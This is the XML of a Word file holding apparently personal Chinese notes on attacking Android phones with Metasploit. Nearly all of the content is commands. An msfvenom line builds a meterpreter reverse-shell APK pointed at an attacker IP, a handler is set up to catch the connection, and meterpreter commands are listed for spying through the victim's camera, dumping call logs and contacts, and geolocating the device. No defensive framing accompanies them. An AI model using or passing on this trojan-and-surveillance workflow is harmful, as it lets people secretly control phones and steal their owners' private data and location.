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beforeLines="0" w:afterLines="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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Metasploit 之渗透安卓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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Msfconsole 启动metasploit的命令行模式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLine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·木马： 控制端（控制原程） ---------  服务端（木马程序）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLine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根据自己的IP生成一个木马（192.168.136.129）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/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Msfvenom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-p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android/meterpreter/reverse_tcp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LHOST=192.168.136.129 LPORT=55555 R &gt; test.apk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/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将生成的文件传送到手机，并在手机打开文件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Msfconsole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use exploit/multi/handler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set payload android/meterpreter/reverse_tcp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set LHOST 192.168.136.129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set LPORT 55555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Exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/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表示手机安装不了，手机谨慎心太强了（</w:t>
      </w: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" cy="457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  <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）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玩一下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/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Webcam_chat  —— 手机摄像头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:leftChars="0"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Webcam_stream -i 1[2]  —— 手机摄像头监控，默认是1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/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Webcam_snap  —— 手机截屏</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/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Webcam_list  —— 选择前后摄像头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/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Check_root  —— 检查是否root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/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Dump_calllog —— 下载电话记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind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Dump_contacts  —— 下载信息记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:leftChars="0"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Geolocate  —— 定位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeLines="0" w:afterLines="0"/>
        <w:ind w:leftChars="0"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spacing w:beforeLines="0" w:afterLines="0"/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 w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia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 w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0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8D4F4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="56B8D4F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CE217A"/>
    <w:rsid w:val="0DE6116E"/>
    <w:rsid w:val="188C2400"/>
    <w:rsid w:val="200A433F"/>
    <w:rsid w:val="22557495"/>
    <w:rsid w:val="2EA75507"/>
    <w:rsid w:val="336F378D"/>
    <w:rsid w:val="38833649"/>
    <w:rsid w:val="38E42983"/>
    <w:rsid w:val="40243A4A"/>
    <w:rsid w:val="40266332"/>
    <w:rsid w:val="42874596"/>
    <w:rsid w:val="43FC0A26"/>
    <w:rsid w:val="45974A62"/>
    <w:rsid w:val="48B57938"/>
    <w:rsid w:val="4A1274AE"/>
    <w:rsid w:val="4D492133"/>
    <w:rsid w:val="564103BD"/>
    <w:rsid w:val="5662107C"/>
    <w:rsid w:val="57DA5FE2"/>
    <w:rsid w:val="609A06A7"/>
    <w:rsid w:val="60C267AF"/>
    <w:rsid w:val="69D6483E"/>
    <w:rsid w:val="77CE0BA8"/>
    <w:rsid w:val="77D262A7"/>
    <w:rsid w:val="7BC629FD"/>
    <w:rsid w:val="7C4E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2019-07-24T11:14:00Z</dcterms:created>
  <dc:creator>柠檬不萌</dc:creator>
  <cp:lastModifiedBy>柠檬不萌</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-27T09:29:06Z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